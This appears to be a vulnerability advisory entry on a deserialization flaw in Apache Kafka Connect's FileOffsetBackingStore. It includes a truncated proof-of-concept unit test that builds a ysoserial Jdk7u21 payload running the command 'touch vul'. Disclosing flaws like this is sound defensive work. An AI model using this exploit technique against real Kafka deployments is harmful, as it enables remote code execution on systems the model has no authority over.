Apache Kafka desrialization vulnerability

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

Apache kafka connect-api runtime contains a desrialization vul via FileOffsetBackingStore which leads to remote code execution, this can be exploited reliably in JDK1.7.0_05, below is a unit test for it: ``` import junit.framework.Test; import junit.framework.TestCase; import junit.framework.TestSuite; import org.apache.commons.io.FileUtils; import org.apache.kafka.connect.runtime.standalone.StandaloneConfig; import org.apache.kafka.connect.storage.FileOffsetBackingStore; import ysoserial.payloads.Jdk7u21; import java.io.ByteArrayOutputStream; import java.io.File; import java.io.IOException; import java.io.ObjectOutputStream; import java.util.HashMap; import java.util.Map; public void test_Kafka_Deser() throws Exception { StandaloneConfig config; String projectDir = System.getProperty("user.dir"); Jdk7u21 jdk7u21 = new Jdk7u21(); Object o = jdk7u21.getObject("touch vul"); byte[] ser = serialize(o); File tempFile = new File(projectDir + "/payload.ser");...

0%

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息